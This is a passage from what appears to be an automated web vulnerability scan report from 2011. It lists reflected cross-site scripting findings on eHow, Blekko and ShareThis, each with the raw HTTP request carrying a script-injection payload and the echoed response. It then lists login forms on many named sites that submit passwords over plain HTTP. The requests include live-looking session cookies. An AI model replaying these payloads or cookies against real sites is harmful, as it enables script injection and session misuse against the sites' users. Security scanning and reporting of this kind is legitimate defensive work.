...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "e1e97</script><script>alert(1)</script>0fc653e07d5";

       </script>
...[SNIP]...

4.700. https://www.ehow.com/WebResource.axd [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/WebResource.axd

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d4de</script><script>alert(1)</script>62a90938785 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /WebResource.axd HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=3d4de</script><script>alert(1)</script>62a90938785

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 02 Feb 2011 15:46:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28888

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow | How To Do Just About Everything! | How To
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "3d4de</script><script>alert(1)</script>62a90938785";

       </script>
...[SNIP]...

4.701. https://www.ehow.com/content/compressed/en-US/common-mXhI4A.css [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/content/compressed/en-US/common-mXhI4A.css

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 853b7</script><script>alert(1)</script>acd0c1c1806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/compressed/en-US/common-mXhI4A.css HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=853b7</script><script>alert(1)</script>acd0c1c1806

Response

HTTP/1.1 404 File not Found
Connection: close
Date: Wed, 02 Feb 2011 15:45:53 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28888

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow | How To Do Just About Everything! | How To
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "853b7</script><script>alert(1)</script>acd0c1c1806";

       </script>
...[SNIP]...

4.702. https://www.ehow.com/forms/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c8de</script><script>alert(1)</script>c257e1020ae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /forms/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=5c8de</script><script>alert(1)</script>c257e1020ae

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:18:15 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68936

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Forms - eHow.com</title>
       <meta charset="UTF-8"
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "5c8de</script><script>alert(1)</script>c257e1020ae";

       </script>
...[SNIP]...

4.703. https://www.ehow.com/forms/PasswordRetrieval.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/PasswordRetrieval.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b77a3</script><script>alert(1)</script>f21f6854d43 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /forms/PasswordRetrieval.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=b77a3</script><script>alert(1)</script>f21f6854d43

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:43 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25094

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title></title>
       <meta charset="UTF-8" />
       <meta htt
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "b77a3</script><script>alert(1)</script>f21f6854d43";

       </script>
...[SNIP]...

4.704. https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/Support/DisplayCaptchaImage.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9816e</script><script>alert(1)</script>c79d7af261c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /forms/Support/DisplayCaptchaImage.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9816e</script><script>alert(1)</script>c79d7af261c

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 02 Feb 2011 15:46:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28888

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow | How To Do Just About Everything! | How To
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "9816e</script><script>alert(1)</script>c79d7af261c";

       </script>
...[SNIP]...

4.705. https://www.ehow.com/forms/signin.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/signin.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d60b6</script><script>alert(1)</script>0dc090f33f6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /forms/signin.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d60b6</script><script>alert(1)</script>0dc090f33f6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:38 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24325

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Sign In to eHow | eHow.com
</title>
       <meta
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "d60b6</script><script>alert(1)</script>0dc090f33f6";

       </script>
...[SNIP]...

4.706. https://www.ehow.com/privacy.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/privacy.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38441</script><script>alert(1)</script>6930395ab2b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /privacy.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=38441</script><script>alert(1)</script>6930395ab2b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:46:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49154

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Privacy Policy | eHow.com</title>
       <meta charse
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "38441</script><script>alert(1)</script>6930395ab2b";

       </script>
...[SNIP]...

4.707. https://www.ehow.com/terms_use.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/terms_use.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36718</script><script>alert(1)</script>f2cd512ee5a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /terms_use.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=36718</script><script>alert(1)</script>f2cd512ee5a

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:46:15 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73168

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Terms of Use | eHow.com</title>
       <meta charset=
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "36718</script><script>alert(1)</script>f2cd512ee5a";

       </script>
...[SNIP]...

4.708. http://blekko.com/join [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/join

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de32a"><script>alert(1)</script>784d2feb8f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /join?de32a"><script>alert(1)</script>784d2feb8f0=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 02 Feb 2011 19:41:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 113
Location: https://blekko.com/join?de32a"><script>alert(1)</script>784d2feb8f0=1
X-Blekko-PT: 2b19a2ade14e03ad227191e19f07ab81

The document has moved <a href="https://blekko.com/join?de32a"><script>alert(1)</script>784d2feb8f0=1">here</a>.

4.709. http://blekko.com/login [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7a44"><script>alert(1)</script>047c1089db5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /login?f7a44"><script>alert(1)</script>047c1089db5=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 02 Feb 2011 19:41:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 114
Location: https://blekko.com/login?f7a44"><script>alert(1)</script>047c1089db5=1
X-Blekko-PT: ee7a4f21c5612360c250694ca959a79a

The document has moved <a href="https://blekko.com/login?f7a44"><script>alert(1)</script>047c1089db5=1">here</a>.

4.710. http://seg.sharethis.com/getSegment.php [__stid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The value of the __stid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 585c9"><script>alert(1)</script>a1d1042bd was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?fpc=fa38af9-12dddaf19a7-13ff2714-2&purl=null&jsref= HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.c99a19d7384984446908be08d7b2b8b1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=Cs8yN00nznknhnUGHGW1Ag==585c9"><script>alert(1)</script>a1d1042bd

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 01 Feb 2011 14:32:02 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 317

       <html>
       <head><title>ShareThis Segmenter</title></head>
       <body>

       No Segment
       <img src="http://b.scorecardresearch.com/p?c1=7&c2=8097938&cv=2.0&cj=1&rnd1296570722 />

           <div style='display:none'>clicookie:Cs8yN00nznknhnUGHGW1Ag==585c9"><script>alert(1)</script>a1d1042bd
userid:
</div>
...[SNIP]...

5. Cleartext submission of password previous next
There are 37 instances of this issue:

http://boardreader.com/my.html
http://clickaider.com/
http://it.toolbox.com/blogs/database-soup
http://it.toolbox.com/blogs/database-talk
http://it.toolbox.com/blogs/db2luw
http://it.toolbox.com/blogs/db2zos
http://it.toolbox.com/blogs/elsua
http://it.toolbox.com/blogs/juice-analytics
http://it.toolbox.com/blogs/minimalit
http://it.toolbox.com/blogs/penguinista-databasiensis
http://it.toolbox.com/blogs/ppmtoday
http://wp-superslider.com/
http://www.astaro.org/
http://www.ehow.com/account/simple_login.aspx
http://www.ehow.com/account/simple_register.aspx
http://www.evow.com/
http://www.evow.com/
http://www.facebook.com/
http://www.facebook.com/r.php
http://www.plentyoffish.com/
http://www.plentyoffish.com/inbox.aspx
http://www.plentyoffish.com/meetme.aspx
http://www.plentyoffish.com/needs_test.aspx
http://www.plentyoffish.com/poftest.aspx
http://www.plentyoffish.com/seriousintro.aspx
http://www.ratedesi.com/
http://www.ratedesi.com/
http://www.reddit.com/domain/static.2mdn.net/new/x22
http://www.reddit.com/domain/static.2mdn.net/new/x22
http://www.reddit.com/domain/static.2mdn.net/x22
http://www.reddit.com/domain/static.2mdn.net/x22
http://www.shape.com/workouts/articles/blood_sugar.html
http://www.shape.com/workouts/articles/workout_schedule.html
http://www.threatexpert.com/signin.aspx
http://www.threatexpert.com/signup.aspx
http://www.untraceableemail.net/boobitrap/eCheck.php
http://www.worldmastiffforum.com/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

5.1. http://boardreader.com/my.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/my.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://boardreader.com/my/subscription.html

The form contains the following password field:

pass

Request

GET /my.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:03:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
                                           <form name="mylogin_" action="/my/subscription.html" method="POST">
               <table cellpadding="0" cellspacing="0" border="0" align="center" >
...[SNIP]...
<td align="left">
                           <input class="yacc_input_text" style="margin-top:5px;width:100px;" type="password" id="pass" name="pass" value="" />
                       </td>
...[SNIP]...

5.2. http://clickaider.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://clickaider.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://clickaider.com/user/login.html

The form contains the following password field:

pass

Request

GET / HTTP/1.1
Host: clickaider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.0
Set-Cookie: PHPSESSID=2dblg2ojg95vrueh1o2ogo6fc7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Thu, 03 Feb 2011 07:29:14 GMT
Server: lighttpd/1.4.28
Content-Length: 19931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ClickAider Click T
...[SNIP]...
<tr class="reg-main-table">
<form id="login_member" name="login_member" action="/user/login.html" method="post" style="padding: 0px; margin: 0px;">
<td valign="top">
...[SNIP]...
<p class="reg"><input class="input-reg" name="pass" type="password" />
</td>
...[SNIP]...

5.3. http://it.toolbox.com/blogs/database-soup previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-soup

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/database-soup

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-soup HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.4. http://it.toolbox.com/blogs/database-talk previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-talk

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/database-talk

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-talk HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.5. http://it.toolbox.com/blogs/db2luw previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2luw

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/db2luw

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2luw HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.6. http://it.toolbox.com/blogs/db2zos previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2zos

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/db2zos

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2zos HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
